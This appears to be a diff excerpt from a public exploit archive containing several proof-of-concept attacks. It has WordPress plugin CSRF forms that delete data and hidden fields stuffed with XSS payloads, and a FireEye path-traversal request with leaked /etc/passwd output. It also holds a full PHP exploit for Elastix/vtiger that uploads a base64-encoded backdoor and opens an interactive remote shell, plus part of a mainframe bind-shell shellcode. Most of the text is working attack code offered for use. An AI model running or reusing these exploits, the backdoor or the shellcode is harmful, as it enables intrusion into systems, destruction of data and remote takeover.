<input type="hidden" name="styles&#91;153&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;154&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;155&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;156&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;157&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;158&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;159&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;160&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;161&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;162&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;163&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;164&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;165&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;166&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;167&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;513&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;176&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;177&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;178&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;179&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;180&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;181&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;182&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;183&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;184&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;185&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;186&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;187&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;188&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;189&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;171&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;514&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;172&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;173&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;174&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;175&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;169&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;521&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;522&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;170&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;523&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;535&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;536&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;537&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;538&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;539&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;540&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;541&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;542&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;543&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;544&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;545&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;546&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;547&#93;" value="solid" />
<input type="hidden" name="styles&#91;548&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;549&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;550&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;551&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;524&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;525&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;526&#93;" value="normal" />
<input type="hidden" name="styles&#91;527&#93;" value="normal" />
<input type="hidden" name="styles&#91;528&#93;" value="none" />
<input type="hidden" name="styles&#91;529&#93;" value="inherit" />
<input type="hidden" name="styles&#91;530&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;531&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;532&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;533&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;534&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;91&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;50&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;212&#93;" value="left" />
<input type="hidden" name="styles&#91;92&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;93&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;209&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;100&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;101&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;127&#93;" value="solid" />
<input type="hidden" name="styles&#91;102&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;103&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;104&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;105&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;94&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;95&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;96&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;97&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;98&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;99&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;106&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;107&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;108&#93;" value="normal" />
<input type="hidden" name="styles&#91;109&#93;" value="normal" />
<input type="hidden" name="styles&#91;110&#93;" value="none" />
<input type="hidden" name="styles&#91;112&#93;" value="inherit" />
<input type="hidden" name="styles&#91;515&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;113&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;114&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;115&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;116&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;51&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;52&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;124&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;516&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;125&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;126&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;117&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;118&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;119&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;120&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;121&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;122&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;552&#93;" value="1" />
<input type="hidden" name="styles&#91;553&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;554&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;555&#93;" value="normal" />
<input type="hidden" name="styles&#91;556&#93;" value="normal" />
<input type="hidden" name="styles&#91;596&#93;" value="none" />
<input type="hidden" name="styles&#91;590&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;591&#93;" value="solid" />
<input type="hidden" name="styles&#91;592&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;558&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;559&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;560&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;561&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;563&#93;" value="1" />
<input type="hidden" name="styles&#91;562&#93;" value="1" />
<input type="hidden" name="styles&#91;597&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;598&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;564&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;565&#93;" value="normal" />
<input type="hidden" name="styles&#91;566&#93;" value="normal" />
<input type="hidden" name="styles&#91;594&#93;" value="none" />
<input type="hidden" name="styles&#91;567&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;568&#93;" value="solid" />
<input type="hidden" name="styles&#91;569&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;570&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;571&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;572&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;573&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;574&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;595&#93;" value="none" />
<input type="hidden" name="styles&#91;575&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;576&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;577&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;578&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;579&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;580&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;581&#93;" value="normal" />
<input type="hidden" name="styles&#91;582&#93;" value="normal" />
<input type="hidden" name="styles&#91;593&#93;" value="none" />
<input type="hidden" name="styles&#91;583&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;584&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;585&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;586&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;599&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;628&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin,
making the victim administrator user deletes a form (PoC # 1), delete a form element (PoC # 2), or delete an existing template (PoC # 3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids&#91;&#93;" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter&#95;form" value="3" />
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;type" value="0" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids&#91;&#93;" value="9" />
<input type="hidden" name="ids&#91;&#93;" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter&#95;state" value="2" />
<input type="hidden" name="filter&#95;search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids&#91;&#93;" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids&#91;&#93;" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
<!---
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
->

52
platforms/php/webapps/38090.txt Executable file
View file

@ -0,0 +1,52 @@
Just one of many handfuls of FireEye / Mandiant 0day. Been sitting on this for more than 18 months with no fix from those security "experts" at FireEye. Pretty sure Mandiant staff coded this and other bugs into the products. Even more sad, FireEye has no external security researcher reporting process.
FireEye appliance, unauthorized remote root file system access. Oh cool, web server runs as root! Now that's excellent security from a _security_ vendor :) Why would you trust these people to have this device on your network?!?!?
https://fireeyeapp/script/NEI_ModuleDispatch.php?module=NEI_AdvancedConfig&function=HapiGetFileContents&name=../../../../../../../../../../../etc/passwd&extension=&category=operating%20system%20logs&mode=download&time=...&mytoken=...
...
root:aaaaa:16209:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16209::::::
rpc:!!:16209:0:99999:7:::
saslauth:!!:16209::::::
postfix:!!:16209::::::
rpcuser:!!:16209::::::
nfsnobody:!!:16209::::::
apache:!!:16209::::::
ntp:!!:16209::::::
lighttpd:!!:16209::::::
sshd:!!:16209::::::
mailnull:!!:16209::::::
smmsp:!!:16209::::::
openvpn:!!:16209::::::
tcpdump:!!:16209::::::
applianceuser:<redacted>:16209:0:99999:7:::
rproxy:aaaaa:16209:0:99999:7:::
sfserver:aaaaa:16209:0:99999:7:::
provisioning:aaaaa:16209:0:99999:7:::
upgrayedd:aaaaa:16209:0:99999:7:::
sftasker:aaaaa:16209:0:99999:7:::
felistener:aaaaa:16209:0:99999:7:::
lighthouse:aaaaa:16209:0:99999:7:::
crlfactory:aaaaa:16209:0:99999:7:::
panlistener:aaaaa:16209:0:99999:7:::
fireeye:<redacted>:16209:0:99999:7:::
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen

95
platforms/php/webapps/38091.php Executable file
View file

@ -0,0 +1,95 @@
<?
echo "\n+-------------------------------------------+\n";
echo "| Elastix <= 2.4 |\n";
echo "| PHP Code Injection Exploit |\n";
echo "| By i-Hmx |\n";
echo "| sec4ever.com |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN));
$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo="));
?>';
$faf=fopen("fa.txt","w+");
fwrite($faf,$inj);
fclose($faf);
$myf='fa.txt';
$url =
$target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00";
// URL
$reffer = "http://1337s.cc/index.php";
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
echo "| Injecting 1st payload\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
echo "| Injecting 2nd payload\n";
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");
echo "| Testing total payload\n";
$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");
if(!eregi("Faris on the mic :D",$total))
{
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if(!eregi("farsawy",$cmd))
{
echo " + Cmd couldn't executed but we can evaluate php code\n + use :
$target//vtigercrm/fa.php\n Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host=str_replace('https://','',$target);
while(1){
echo "i-Hmx@$host# ";
$c=trim(fgets(STDIN));
if($c=='exit'){die("[+] Terminating\n");}
$payload=base64_encode("passthru('$c');");
$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");
$done=kastr($fuck,"-----------------","-----------------");
echo "$done\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
?>

920
platforms/system_z/shellcode/38075.txt
View file

@ -1,584 +1,158 @@
TITLE 'bind shell for mainframe/system Z'
BINDSH CSECT
BINDSH AMODE 31
BINDSH RMODE ANY
***********************************************************************
* *
* @SETUP registers and save areas *
* *
***********************************************************************
@SETUP DS 0F # full word boundary
STM 14,12,12(13) # save our registers
LARL 15,@SETUP # base address into R15
LR 8,15 # copy R15 to R8
USING @SETUP,8 # R8 for addressability throughout
LARL 11,SAVEAREA # sa address
ST 13,4(,11) # save callers save area
LR 13,11 # R13 to our save area
DS 0H # halfword boundaries
***********************************************************************
* *
* @LOADFS - load all the functions we need *
* for SC loop this *
* *
***********************************************************************
@LOADFS L 2,FFUNC # first function we use
LHI 3,8 # used for our index
L 4,NUMFUNC # number of functions to load
@LDLOOP LR 0,2 # load string of func name
XR 1,1 # clear R1
SVC 8 # perform LOAD
XC 0(8,2),0(2) # clear current Func space
ST 0,0(0,2) # store addr in func space
AR 2,3 # increment R2 by 8
AHI 4,-1 # decrement R4
CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop
***********************************************************************
* *
* Create pipes to be used to communicate with child proc *
* that will be created in upcoming forking *
* *
***********************************************************************
@CPIPES LARL 14,@CFD
BRC 15,LPIPE # get FDs for child proc
@CFD ST 5,CFDR # store child read fd
ST 6,CFDW # store child write fd
@CPIPE2 LARL 14,@PFD
BRC 15,LPIPE # get FDs for parent proc
@PFD ST 5,PFDR # store parent read fd
ST 6,PFDW # store parent write fd
***********************************************************************
* *
* BP1FRK (FORK) fork a child process *
* *
***********************************************************************
LFORK L 15,BFRK # load func addr to 15
CALL (15),(CPROCN,RTN_COD,RSN_COD),VL
BRAS 0,@PREPCHL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,1 # load 1 for RC / Debugging
L 6,CPROCN # locad Ret val in R6
CIB 6,-1,8,EXITP # compare R6 to -1 and jump if eq
****************************************************
* prepare the child process for exec , only runs *
* if CPROCN (child pid from fork) equals 0 *
****************************************************
@PREPCHL L 2,CPROCN # load child proc # to R2
CIB 2,0,7,@PREPPAR # R2 not 0? We are parent, move on
*************************************************
* order of things to prep child pid *
* 0) Close parent write fd *
* 1) Close child read fd *
* 2) dupe parent read fd to std input *
* 3) dupe child write fd to std output *
* 4) dupe child write fd to std err *
* 5) Close parent read fd *
* 6) Close child write fd *
* 7) exec /bin/sh *
*************************************************
LARL 14,@PRC1
LA 2,F_CLOSFD
L 5,PFDW # load R5 with pfdw
L 6,PFDW # load R5 with pfdw
@PRC0 BRC 15,LFCNTL # call close
@PRC1 LARL 14,@PRC2
LA 2,F_CLOSFD
L 5,CFDR # load R5 with cfdr
L 6,CFDR # load R5 with cfdr
BRC 15,LFCNTL # call close
@PRC2 LARL 14,@PRC3
LA 2,F_DUPFD2 # gonna do a dup2
L 5,PFDR # parent read fd
LGFI 6,0 # std input
BRC 15,LFCNTL # call dupe2
@PRC3 LARL 14,@PRC4
LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,1 # std output
BRC 15,LFCNTL # call dupe2
@PRC4 LARL 14,@PRC5 # if 0 we are in child pid, goto exec
LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,2 # std error
BRC 15,LFCNTL # call dupe2
@PRC5 LARL 14,@PRC6
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRC6 LARL 14,@PRC7
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
@PRC7 BRAS 0,LEXEC
***********************************************************************
* *
* BP1EXC (EXEC) execute shell '/bin/sh' *
* *
***********************************************************************
LEXEC L 15,BEXC # load func addr to 15
CALL (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL, x
EXENVC,EXENVLL,EXENVL, x
EXITRA,EXITPLA, x
RTN_VAL,RTN_COD,RSN_COD),VL
BRAS 0,GOODEX # exit child proc after exec
****************************************************
* prepare the parent process to speak with child *
* order of things to prep parent pid *
* 0) close parent fd read *
* 1) close child fd write *
* 2) socket,bind,accept,listen,read & write *
* 3) set client socked and child fd write *
* to non_blocking *
****************************************************
@PREPPAR LARL 14,@PRP1
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRP1 LARL 14,LSOCK
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
***********************************************************************
* *
* BPX1SOC set up socket - inline *
* *
***********************************************************************
LSOCK L 15,BSOC # load func addr to 15
CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,2
L 6,RTN_VAL
